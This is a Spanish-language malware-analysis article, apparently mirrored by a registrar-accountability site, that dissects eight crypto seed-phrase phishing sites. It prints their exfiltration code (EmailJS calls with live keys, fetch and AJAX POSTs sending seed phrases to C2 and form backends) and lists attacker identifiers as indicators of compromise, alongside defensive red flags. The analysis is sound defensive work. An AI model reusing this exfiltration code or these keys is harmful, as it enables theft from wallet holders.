Editorial mirrorBrand mentions redacted to public IDs. Hover to inspect. Everything else is theatre.How it works
THE ENABLERS REGISTRYRegistrar accountability archive
Archive LiveRead-only public record · No ads · No tracking
Case file folder with redacted documents and confidential investigation report.
CASE / ES / PHISHING ANATOMY

Análisis de ingeniería inversa de 8 programas para robar frases de semillas

The Enablers Registry·Editorial mirror·/es/phishing-anatomy

Public record copy. Brand names withheld, public accreditation numbers preserved. If the body below says “we”, that means the original publisher, not this mirror. TER only preserves, redacts, and re-contextualizes.

Anatomía del possibly phishing relacionado con las criptomonedas:
Análisis de 8 ataques reales

Hemos interceptado tráfico de possibly phishing en tiempo real, hemos realizado ingeniería inversa en cinco programas de robo de frases de inicialización y hemos rastreado los datos robados hasta bots de [REDACTED], cuentas de EmailJS y backends de «possibly phishing como servicio».

27 de marzo de 2026 Investigación de THE ENABLERS REGISTRY 18 minutos de lectura
Análisis de una investigación sobre phishing relacionado con las criptomonedas
El análisis en tiempo real del tráfico de possibly phishing interceptado revela toda la infraestructura del ataque
8Sitios analizados
7Métodos de exfiltración
1,824+Datos de acceso robados
380+Marcas de carteras
$0Coste del atacante

Lo que hemos descubierto

Cada día, miles de usuarios de criptomonedas pierden su dinero a causa de páginas de possibly phishing que parecen idénticas a los servicios legítimos de monederos electrónicos. Pero, ¿qué ocurre? detrás de ¿El botón falso «Connect Wallet»? ¿Dónde va a parar realmente tu frase de semillas?

Hemos interceptado tráfico HTTP en tiempo real procedente de cinco sitios web de possibly phishing activos, hemos descargado su código fuente completo y hemos rastreado cada punto final de exfiltración de datos hasta su destino final. Esta investigación revela la anatomía completa del cripto-possibly phishing moderno: desde las tácticas de ingeniería social que te llevan a introducir tu frase de semillas, hasta el bot de [REDACTED] que se la envía al atacante en tiempo real.

Aviso legal

Todas las frases de semilla que aparecen en este artículo son datos de prueba generados aleatoriamente. No se han visto comprometidas credenciales reales durante esta investigación. Se ha informado de todos los sitios web a sus respectivos proveedores de alojamiento y departamentos de abuso.

El patrón de ataque universal

A pesar de las diferencias en la marca y los sistemas de fondo, los ocho sitios de possibly phishing siguen el exactamente el mismo proceso psicológico:

Página de destinoFomento de la confianza
Selector de carterasEntre 60 y 110+ logotipos
Mensaje falso «Conectando...»Temporizador de 3 a 5 segundos
«Error de conexión»Siempre falla
Introducción manualSemilla / Clave / Almacén de claves
ExfiltraciónTG / Correo electrónico / API

La idea clave: la animación «Conectando...» siempre es programado para fallar. En el código fuente del sitio n.º 4, encontramos const success = false — No se produce ningún intento de conexión con el monedero. Todo el proceso tiene como único objetivo dirigir a las víctimas hacia el formulario «Conectar manualmente».

Cadena de ataque de phishing con criptomonedas en seis pasos
La cadena de ataque universal de seis pasos común a todos los sitios web de possibly phishing que hemos analizado

Los 8 sitios web: análisis detallado

1
Protocolo de la capa de red
[REDACTED]
En directoIANA #1910 PagesBot de [REDACTED] + EmailJS

Suplantación de identidad

Un «protocolo descentralizado» ficticio para la validación de monederos. Utiliza los tickers de precios en tiempo real de CryptoCompare y enlaces a exploradores de blockchain reales (Ethereum, BSC, Polygon, Avalanche, Solana, Cardano) para dar credibilidad al sitio. La página de inicio muestra más de 100 logotipos de monederos y un proceso de «validación» en tres pasos.

La cadena de exfiltración dual

El backend más sofisticado de los cinco: todas las credenciales robadas se envían a través de dos canales independientes al mismo tiempo:

Victim submits seed phrase
  |
  +--> Channel 1: axios POST --> Express.js on [REDACTED]
  |      |
  |      +--> [REDACTED] Bot API --> @metatech2 (instant DM)
  |
  +--> Channel 2: fetch POST --> EmailJS API
         |
         +--> Bestgrace309@gmail.com (email backup)

Conclusiones de OSINT

IndicadorValor
Correo electrónico fraudulentoBestgrace309@gmail.com
Bot de [REDACTED]@DewdropsTG_bot (ID: 7567323692)
Destinatario de [REDACTED]@metatech2 (ID de chat: 7350941887)
Backend[REDACTED]
Servicio EmailJSservice_d5qigxs / template_7bqxeaa
Dominio ocultolayerschain.in (procedente de la ofuscación del correo electrónico de CF)
Mensajes enviados1.824+ (según el «message_id» de [REDACTED])
Antigüedad del dominio2 días (TLS: 25 de marzo de 2026)
Fallo de seguridad operativa (OPSEC)

El correo electrónico del atacante se encontró en un Comentario en JavaScript dentro config.js: // Bestgrace309@gmail.com. Se olvidaron de eliminarlo antes de la implementación. Además, el backend del relé de [REDACTED] es totalmente abierto: sin autenticación ni limitación de frecuencia. Al descodificar el data-cfemail Además de la ofuscación en el código HTML, también hemos descubierto una dirección de correo electrónico oculta: support@layerschain.in, conectada a infraestructuras de alojamiento de la India y Sudáfrica.

2
Migración del token AQLA
[REDACTED]
En directoIANA #1910 PagesFormularios no estáticos

Suplantación de identidad

Una reproducción fiel al píxel de la realidad Aqualibre (AQLA) página de migración de tokens. El código HTML contiene una etiqueta de metadatos que revela la fuente: data-scrapbook-source="https://token.[REDACTED]/migration", con fecha del 19 de noviembre de 2024.

El enfoque «sin código»

Este atacante necesita sin código del lado del servidor. El formulario envía los datos directamente a No estático — un backend de formularios legítimo para sitios web estáticos. Cada envío se reenvía al correo electrónico del estafador. El correo electrónico del atacante es nunca aparece en el código fuente.

<form action="https://forms.[REDACTED]/forms/c78173e2d991...94c3f76">
  <textarea name="phrase"></textarea>
  <input name="private-key" />
  <textarea name="keystore-json"></textarea>
  <input name="password" />
</form>
Precio: 0 $

IANA #1910 Pages: gratis. Formularios no estáticos: gratis. No se han adquirido dominios. No se han alquilado servidores. Coste total de la infraestructura: cero dólares.

3
[REDACTED] Typosquat
[REDACTED]
En directo IANA #1910 Pages Formularios no estáticos

Suplantación de identidad

El subdominio contiene «safpal» — un error ortográfico deliberado de [REDACTED], una cartera de hardware muy popular. La página se hace pasar por «Blockchain Wallet Rectification» y cuenta con 26 categorías de noticias falsas. Utiliza Typed.js para animar los nombres de las cadenas (Ethereum, BSC, Polygon...) y un ticker de LiveCoinWatch para dar credibilidad.

¿El mismo equipo, el mismo operador?

Utiliza el exactamente la misma plantilla de possibly phishing como emplazamiento n.º 2: idéntico connect.html, idéntico wallets.html con más de 60 logotipos, el mismo backend de Un-static (con un ID de formulario diferente — 6f1b82c3...da9943af). El hecho de que el kit sea idéntico sugiere claramente que un operador que gestiona ambos sitios.

Errores en el código: «Privay Policy» (falta una «c»), «seperated» (debería ser «separated»), «Kestore» (falta una «y»). El campo de contraseña utiliza type="text" en lugar de type="password".

4
Clon de Flare Network
[REDACTED]
En directoIANA #1910 PagesEmailJS dual (redundancia)

Suplantación de identidad

Un clon casi perfecto del Red Flare portal: una auténtica cadena de bloques EVM de capa 1 con los protocolos FTSO y Data Connector. Reproduce a más de 30 socios del ecosistema, la navegación y la imagen de marca. Los favicons se cargan desde un dominio typosquat: [REDACTED] (falta una «n» en «mainnet»).

Redundancia doble de EmailJS

El único sitio web que utiliza dos cuentas de EmailJS independientes al mismo tiempo para garantizar la redundancia frente a posibles caídas del servicio:

// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4

// Channel 2: jQuery AJAX direct
$.ajax('https://api.[REDACTED]/api/v1.0/email/send', {
  data: { service_id: 'service_isy47de',
          template_id: 'template_dkk4d1b',
          user_id: 'JsVEgXVcaSTro1etu' }
})

Asunto del correo electrónico para cada robo: "New Wallet Details from Flare".

Esta es una empresa que cuenta con financiación

El código HTML contiene Google Tag Manager (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Protección PPC de Lunio, y un Píxel de Twitter/X Ads. El atacante está ejecutando publicidad de pago para atraer a las víctimas al sitio web de possibly phishing y filtrar los clics de los bots. Esto no es un pasatiempo, sino una operación financiada que cuenta con herramientas de análisis y presupuesto publicitario.

Página web de phishing de Flare Network que utiliza EmailJS y publicidad de pago
Sitio n.º 4: anuncios de pago, seguimiento analítico y doble exfiltración: la operación más profesional
5
COIN NODE / Corrección de la cartera (PhaaS)
[REDACTED]
Backend inactivoAPI de PulseResolve (PhaaS)

Suplantación de identidad

Un servicio genérico de «COIN NODE» / «Wallet Fix» (sin marca concreta). Copyright «Wallet Fix 2022»: esta plantilla del kit tiene al menos 4 años de antigüedad. Imágenes alojadas en [REDACTED] (WordPress en AWS).

Possibly phishing como servicio

La arquitectura de backend más preocupante: una API multitenant basada en UUID:

POST https://api.[REDACTED]/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data

wallet=[REDACTED]&type=phrase&phrase=buddy+surprise+vapor+river+...

Cada estafador dispone de su propio punto final UUID. Un operador central se encarga de gestionar la API, realizar un seguimiento de las campañas y, posiblemente, quedarse con una parte de los fondos robados. Esto es robo industrializado de criptomonedas — un modelo de «possibly phishing como servicio».

Infraestructura relacionada (prácticamente inactiva)

DominioFunciónEstado
[REDACTED]API de exfiltraciónNXDOMAIN
[REDACTED]Alojamiento de faviconsNXDOMAIN
[REDACTED]Alojamiento de logotiposNXDOMAIN
[REDACTED]CDN de imágenesEn directo (AWS)
Zombie Frontend

El backend ya no funciona, pero el La interfaz de usuario sigue activa en IANA #1910 Pages. Si el atacante vuelve a registrar [REDACTED], la página vuelve a estar operativa al instante.

6
Centro de asistencia + Recuperación de [REDACTED]
[REDACTED] y [REDACTED]-recovery.support
En directoIANA #1910 Pages + ReplitAPI C2 personalizadaAutocompletado BIP39

Suplantación de identidad

A operación en dos frentes: un «Centro de asistencia» genérico en [REDACTED] con 15 categorías de emisión falsas y 39 marcas de carteras, además de un Clon de la guía de inicio de [REDACTED] con un diseño perfecto al píxel en [REDACTED]-recovery.support alojado en Replit — que incluye la selección del modelo de dispositivo, la configuración del PIN y una cuadrícula con la frase semilla de 24 palabras con autocompletado BIP39 real.

Backend C2 anti-escáner

La página de asistencia del monedero envía los datos robados a [REDACTED]/log — un servidor C2 personalizado con nginx/Ubuntu detrás de IANA #1910. El backend desestima deliberadamente todas las solicitudes GET (devuelve el error 522 por tiempo de espera agotado), y solo responde a solicitudes POST. Esto significa que los escáneres de URL, los rastreadores de Google Safe Browsing y los investigadores de seguridad que envían solicitudes GET al punto final no obtienen ninguna respuesta: el C2 parece inactivo.

// config.js — C2 config exposed in plaintext
const config = {
  serverURL: "https://api.[REDACTED]",
  allowedWallets: ["[REDACTED]","solfare","[REDACTED]","[REDACTED]",
    "[REDACTED]","[REDACTED]","[REDACTED]","VARA Provisional License","sui","backpack",
    "tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;

// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
  fetch(serverURL + "/log", {
    method: "POST",
    headers: {"Content-Type": "application/json"},
    body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
  })
}

El clon de [REDACTED] ejecuta un backend independiente de Express.js en el propio Replit: POST /api/recovery-phrase recogida {deviceId, pin, phrase}. Devuelve 400 {"error":"Invalid data provided"} ante una entrada incorrecta — lo que confirma que el backend es en funcionamiento y en proceso de validación activa datos robados.

Conclusiones de OSINT

IndicadorValor
Interfaz de usuario (monedero)[REDACTED]
Interfaz de usuario ([REDACTED])[REDACTED]-recovery.support (34.111.179.208)
Backend de C2 [REDACTED] → nginx/1.24.0 Ubuntu
Direcciones IP C2104.21.60.163 / 172.67.198.35 (IANA #1910)
Replit Verifya43d3852-5304-47af-a61b-f0f6f3912736
Secretario[REDACTED] ([REDACTED]-recovery.support)
Implementado9 de enero de 2026 (encabezado «Última modificación»)
Pila tecnológica React + Vite + Tailwind v4.1 + Framer Motion
Máxima fidelidad en la experiencia de usuario

El paquete JS de 466 KB contiene el Lista completa de palabras BIP39 para el autocompletado en tiempo real, 67 referencias a «frase de contraseña» y 39 a «mnemotécnico». El clon de [REDACTED] guía a las víctimas a través del mismo proceso de configuración inicial que un dispositivo [REDACTED] auténtico: la página de possibly phishing más convincente de toda esta investigación. El apiKey El campo de la configuración sugiere un arquitectura PhaaS multitenant.

7
Plataforma de lanzamiento descentralizada
[REDACTED]
En directoIANA #1910 PagesFormSubmit.co

Suplantación de identidad

Una «plataforma de lanzamiento descentralizada» genérica con 21 categorías de cebos (Staking, migración, KYC, sorteos, canje de recompensas, recuperación de activos, preventa, acuñación de NFT, cuentas bloqueadas...) y Más de 70 marcas de carteras — una de las listas de carteras más completas que hemos encontrado. El error ortográfico revelador «Sychronize» (le falta una «n») delata que es falsa.

El proceso de envío de formularios

Usos FormSubmit.co — un servicio legítimo de envío de formularios por correo electrónico. El hash del punto final a2cf4131f1a5d39453c7c183df96f86f es el valor MD5 de la dirección de correo electrónico del estafador. Hemos probado por fuerza bruta cientos de patrones de direcciones de correo electrónico en Gmail, Yahoo, Hotmail, ProtonMail, Yandex y [REDACTED]no hay coincidencias. El estafador utiliza una dirección de correo electrónico poco habitual o generada al azar.

// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
    url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
    method: "POST",
    dataType: "JSON",
    data: {
        dappWord: seedPhrase,       // THE STOLEN SEED PHRASE
        dappName: walletName,       // Which wallet was selected
        linkName: "DAPP DECENTRALIZED"  // Campaign identifier
    }
});

Conclusiones de OSINT

IndicadorValor
Dominio[REDACTED]
Hash de envío de formularioa2cf4131f1a5d39453c7c183df96f86f
ID de la campañaDAPP DESCENTRALIZADA
Kit de FontAwesomebdc3291137 (kit n.º 112310842, versión gratuita 6.7.2)
jQuery3.2.1 + 3.5.1 cargadas simultáneamente
BootstrapCSS 5.2.2 + JS 5.3.0-alpha1 (incompatibilidad)
Dos asas de sujeción

Kit de FontAwesome bdc3291137 — FontAwesome puede identificar al titular de la cuenta asociado a este ID de kit. La etiqueta de la campaña DAPP DECENTRALIZED puede aparecer en otras páginas de possibly phishing que utilicen el mismo hash de FormSubmit. Tras robar la frase de semillas, un código QR falso y código de referencia aleatorio de 7 caracteres Aparece el siguiente mensaje: «Ponte en contacto con el administrador con tu código de referencia único», lo que hace que las víctimas tengan que esperar en lugar de que se investigue el caso.

8
R2 Bucket + PHP en el ordenador de casa
pub-519769e9eb634616b1746c2018641d56.r2.dev
MuertoIANA #1910 R2PHP + DDNS

Suplantación de identidad

Desconocido: tanto el frontend como el backend están fuera de línea. A juzgar por la estructura de la carga útil, se trataba de un programa diseñado para robar la frase semilla de un monedero criptográfico. El Depósito público de IANA #1910 R2 (almacenamiento de objetos, no Pages) es un vector de possibly phishing ampliamente documentado con más de 5.000 páginas maliciosas identificadas y un aumento del tráfico de 61 veces, según ha informado Netskope.

La configuración del «script kiddie»

El más operación primitiva en esta colección. Las frases de inicialización se envían palabra por palabra a un script PHP que se ejecuta en un ordenador doméstico o en un VPS protegido por un servicio gratuito de DNS dinámico:

POST [REDACTED]/fuc.php
Content-Type: application/x-www-form-urlencoded

pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
    +%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
    +%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
    +%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access

Conclusiones de OSINT

IndicadorValor
Interfaz de usuario pub-519769e9eb634616b1746c2018641d56.r2.dev [DESCONECTADO]
Backend [REDACTED] [NXDOMAIN]
ID del cubo R2519769e9eb634616b1746c2018641d56
Proveedor de DDNS [REDACTED] / [REDACTED] (Cincinnati, Ohio)
DNS NSns10–[REDACTED]
Nombre de usuariomercifuljigga4real123
Nombre de usuario en OSINT: mercifuljigga4real123

«Merciful» + «jigga» (el apodo de Jay-Z) + «4real» + «123»: un nombre de usuario claramente personal que sugiere una afinidad con la cultura hip-hop. No encontrado en cualquier plataforma indexada: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch o [REDACTED]. Probablemente esté activo en [REDACTED], [REDACTED] o plataformas de videojuegos con este nombre o variaciones similares. El nombre del archivo fuc.php encaja con el estilo irreverente del tirador.

7 formas de robar tu frase de semillas

Comparación de cuatro métodos de exfiltración de datos mediante phishing en el ámbito de las criptomonedas
Siete arquitecturas de exfiltración distintas utilizadas en los ocho sitios web de possibly phishing
MétodoSitiosCómo funcionaVelocidadCoste
Bot de [REDACTED]#1 Express.js en [REDACTED] actúa como proxy para la API de Bot. El estafador recibe al instante un mensaje directo con las credenciales. En tiempo real$0
EmailJS#1, #4 El JavaScript del lado del cliente envía los datos directamente a la API de EmailJS, que a su vez los remite al correo electrónico del estafador. ~1 min$0
Formularios no estáticos#2, #3 Formulario HTML estándar de tipo POST enviado a un servicio de formularios legítimo que reenvía los datos enviados por correo electrónico. ~1 min$0
FormSubmit.co#7 jQuery AJAX a FormSubmit.co. Dirección de correo electrónico oculta tras un hash MD5. Campaña etiquetada como «DAPP DECENTRALIZED». ~1 min$0
API C2 personalizada#6 La aplicación [REDACTED] envía las solicitudes a la API de Nginx/Express, que se encuentra detrás de IANA #1910. Rechaza las solicitudes GET (522) para eludir los escáneres. Solo responde a POST. En tiempo real~5 $ al mes
PHP + DDNS#8 Script PHP en un ordenador doméstico a través de un servicio gratuito de DNS dinámico ([REDACTED]). La frase de inicialización se envía palabra por palabra. En tiempo real$0
API de PhaaS#5 API multitenant basada en UUID. Un operador central gestiona el backend, mientras que los estafadores alquilan los puntos de conexión. En tiempo realDesconocido

7 señales de alerta que delatan cualquier página de possibly phishing

Si ves cualquiera Si te encuentras en alguna de estas situaciones, cierra la pestaña inmediatamente:

1. El mensaje «Error de conexión» siempre es falso

Las conexiones con carteras reales utilizan el protocolo WalletConnect o extensiones del navegador. Nunca muestran un error del tipo «Error de conexión» que te pida que introduzcas tu frase de semillas.

2. Entre 50 y más de 110 logotipos de carteras, un único destino

Todos los iconos de monedero llevan al mismo formulario. Un servicio de verdad integraría el SDK específico de cada monedero.

3. «Error» tras enviar el formulario

El falso «Error 503» o «Error desconocido» que aparece tras el envío es intencionado. Tus datos ya han sido robados; el error te engaña para que lo intentes de nuevo con otro monedero.

4. Alojado en .pages.dev

Los cinco sitios web hacen un uso indebido del plan gratuito de IANA #1910 Pages. No se requiere verificación de identidad. El uso indebido de IANA #1910 Pages con fines de possibly phishing aumentó un 198 % en 2025.

5. Tres pestañas: Frase / Clave privada / Almacén de claves

Ningún servicio legítimo necesita los tres tipos de credenciales. Este formulario de tres pestañas es un rasgo característico de los kits de possibly phishing.

6. No hay interacción con la cadena de bloques

Ninguna de estas páginas se carga ethers.js, web3.js, ni realizan llamadas RPC. Son formularios HTML puros que se hacen pasar por dApps.

7. Infraestructura sin coste alguno

Alojamiento web gratuito + servicios de formularios gratuitos + mensajería gratuita = una operación completa de possibly phishing por 0 $. Si la página web no tiene un dominio real, desconfía.

Tabla completa del IOC

Para los equipos de seguridad, las plataformas de inteligencia sobre amenazas y quienes denuncian abusos:

Dominios e infraestructura

DominioTipoEstado
[REDACTED]Interfaz de possibly phishingEn directo
[REDACTED]Interfaz de possibly phishingEn directo
[REDACTED]Interfaz de possibly phishingEn directo
[REDACTED]Interfaz de possibly phishingEn directo
[REDACTED]Interfaz de possibly phishingEn directo
[REDACTED]Backend del relé TGEn directo
[REDACTED]Activos de «typosquatting»Desconocido
layerschain.inDominio relacionadoEl DNS no funciona
[REDACTED]Backend de PhaaSNXDOMAIN
[REDACTED]Servidor de recursosNXDOMAIN
[REDACTED]Alojamiento de logotiposNXDOMAIN
[REDACTED]CDN de imágenesEn directo (AWS)
[REDACTED]Interfaz de possibly phishingEn directo
[REDACTED]-recovery.supportPossibly phishing de [REDACTED] (Replit)En directo
[REDACTED]Backend de C2 (nginx/Ubuntu)En directo
[REDACTED]Dominio raíz404
[REDACTED]Interfaz de possibly phishingEn directo
pub-519769e9eb634616b1746c2018641d56.r2.devPossibly phishing (categoría R2)Sin conexión
[REDACTED]Backend de PHP (DDNS)NXDOMAIN

Cuentas e identificadores

TipoValorSitio web
Correo electrónicoBestgrace309@gmail.com#1
Correo electrónico (oculto)support@layerschain.in#1
Bot de [REDACTED]@DewdropsTG_bot (7567323692)#1
Usuario de [REDACTED]@metatech2 (7350941887)#1
EmailJS n.º 1service_d5qigxs / I-7q0Bs-ilK3rFcWj#1
EmailJS n.º 2service_6dt5h1k / Sza6lhzA9hKHrm1k4#4
EmailJS n.º 3service_isy47de / JsVEgXVcaSTro1etu#4
Formulario no estáticoc78173e2d991...94c3f76#2
Formulario no estático6f1b82c3ce55...da9943af#3
UUID de PhaaSa26db20c-1dc4-4208-a60a-c2c3b22c02ef#5
GTMGTM-WX2D2TR#4
MS Clarityj4bllybjkp#4
Instancia de renderizadorndr-id: ed83576e-b1b3-4c82#1
Replit Verifya43d3852-5304-47af-a61b-f0f6f3912736#6
MD5 de envío de formularioa2cf4131f1a5d39453c7c183df96f86f#7
Etiqueta de campañaDAPP DESCENTRALIZADA#7
Kit de FontAwesomebdc3291137 (kit n.º 112310842)#7
ID del cubo R2519769e9eb634616b1746c2018641d56#8
Nombre de usuario/DDNSmercifuljigga4real123#8

Dónde denunciar los casos de possibly phishing relacionados con las criptomonedas

Dónde denunciar los sitios web de phishing relacionados con las criptomonedas: retirada multivectorial
Dirigirse simultáneamente al alojamiento web, los servicios de backend y las plataformas de mensajería para lograr la máxima rapidez en las retiradas de contenidos
ServicioQué hay que comunicar¿Cómo?
IANA #19107 cuentas de .pages.dev + 1 depósito R2abuse.IANA #1910.com
Google Safe BrowsingTodas las URL de possibly phishingDenunciar un intento de suplantación de identidad
PhishTankTodas las URL de la lista negra de la comunidad[REDACTED]
EmailJS3 cuentas objeto de abuso (ID de servicio indicados anteriormente)abuse@emailjs.com
No estático2 puntos finales del formularioContacto a través de [REDACTED]
[REDACTED]Servidor de retransmisión de [REDACTED]Formulario para denunciar abusos
[REDACTED]@DewdropsTG_bot + @metatech2[REDACTED].org/support
Google (Gmail)Bestgrace309@gmail.comDenuncia de abuso en Google
Twitter/XCuenta publicitaria para promocionar el sitio n.º 4Denunciar un uso indebido de los anuncios de X
FormSubmit.coHash a2cf4131... (n.º 7)Formulario de denuncia de abusos de FormSubmit
Replit[REDACTED]-recovery.support (n.º 6)Denuncia de uso indebido de Replit
[REDACTED]Registrarse en [REDACTED]-recovery.supportAbuso en [REDACTED]
DNSExit[REDACTED]Abuso en [REDACTED]
FontAwesomeKit bdc3291137 (n.º 7)Uso indebido de FontAwesome
ChainabuseTodas las campañas de possibly phishing[REDACTED]

Cómo protegerse

La regla de oro

Ningún servicio legítimo te pedirá jamás que introduzcas tu frase de semillas en una página web. Las frases de semilla solo deben introducirse en el software oficial de la cartera durante el proceso de recuperación de la misma; nunca en páginas web de terceros dedicadas a la «validación», la «sincronización» o la «recuperación».

Antes de conectar cualquier monedero:

  • Comprueba que la URL coincida con el dominio oficial. Comprueba los datos del certificado SSL.
  • Real WalletConnect utiliza un código QR o un enlace directo, nunca un formulario de frase semilla.
  • Si «la conexión falla» y te piden que introduzcas tus datos de acceso manualmente, se trata de un intento de possibly phishing.
  • Comprueba las URL sospechosas en PhishTank o VirusTotal antes de interactuar.
  • Utiliza un monedero físico: requiere una confirmación física para cada transacción.
  • Añade a tus favoritos las direcciones URL oficiales. Nunca hagas clic en enlaces de anuncios, mensajes directos o redes sociales.

La taxonomía del possibly phishing relacionado con las criptomonedas

Los ladrones de frases de semillas son solo una categoría. Aquí tienes una visión general completa del possibly phishing en el ámbito de las criptomonedas; iremos añadiendo análisis en profundidad de cada tipo.

Ladrones de frases de semillas
Páginas falsas de «Connect Wallet» que te engañan para que introduzcas tu frase de recuperación. El tema central de este artículo: análisis detallado de cinco ejemplos reales.
Ya tratado anteriormente
Secuestro de la aprobación
Aplicaciones descentralizadas (dApps) maliciosas que solicitan autorizaciones ilimitadas para tokens a través de [REDACTED]. Una vez aprobadas, el atacante vacía tu monedero sin necesidad de tu frase de recuperación.
Próximamente
Possibly phishing en el hielo (Permit2)
Aprovecha las autorizaciones sin consumo de gas de la EIP-2612. La víctima firma un mensaje fuera de la cadena que concede derechos de transferencia de tokens; no se aprecia ninguna aprobación en la cadena hasta que se produce la sustracción.
Próximamente
Afirmaciones falsas sobre airdrops
Airdrops de tokens falsos que requieren «reclamarlos» a través de un contrato inteligente malicioso. La transacción de reclamación, en realidad, transfiere tus tokens reales fuera de tu cuenta.
Próximamente
Programas que se apropian del portapapeles
Malware que supervisa el portapapeles y sustituye de forma silenciosa las direcciones de monedero copiadas por la dirección del atacante antes de que las pegues.
Próximamente
Polvo + Envenenamiento
Las transacciones de pequeña cuantía procedentes de direcciones muy similares contaminan tu historial. La víctima copia la dirección falsa del historial de transacciones para su próxima transferencia.
Próximamente

La verdad incómoda

El coste de poner en marcha una operación de possibly phishing relacionada con las criptomonedas $0 y tarda menos de 30 minutos. Alojamiento web gratuito, servicios de formularios gratuitos, bots de mensajería gratuitos. El atacante responsable del sitio n.º 1 ya ha obtenido credenciales de Más de 1.824 víctimas. La planta n.º 4 está en funcionamiento publicidad de pago a gran escala. Esto no es cosa de aficionados, es toda una industria. La única defensa es la concienciación.

Ayúdanos a plantar cara

THE ENABLERS REGISTRY rastrea y denuncia sitios web de possibly phishing relacionados con las criptomonedas en tiempo real. Si te has topado con un sitio sospechoso, denúncialo: lo investigaremos y haremos todo lo posible para que sea retirado.

Investigaciones relacionadas

Investigación
El fin de [REDACTED]: IANA #1479 mintió para proteger a un ladrón de M
Robo de Monero que se prolongó durante 10 años. Intervinieron tres registradores. IANA #1479 inventó siete mentiras.
Análisis en profundidad
Redes de drenaje de criptomonedas: infraestructura al descubierto
Cómo las operaciones de «drainer-as-a-service» comparten infraestructura y operadores.
Panel al descubierto
Panel de possibly phishing de [REDACTED]: acceso completo de administrador
Hemos accedido al panel de administración de una operación de possibly phishing relacionada con [REDACTED].
Infraestructura
Se desvela la infraestructura de una estafa: los backends compartidos
Cómo las operaciones fraudulentas comparten servidores, plantillas y flujos de pago.

Continue browsing the ledger

This page is the editorial mirror. Brand names are redacted to public IANA / business identifiers. Use the index to navigate other case files.

Open registrar ledger → All briefings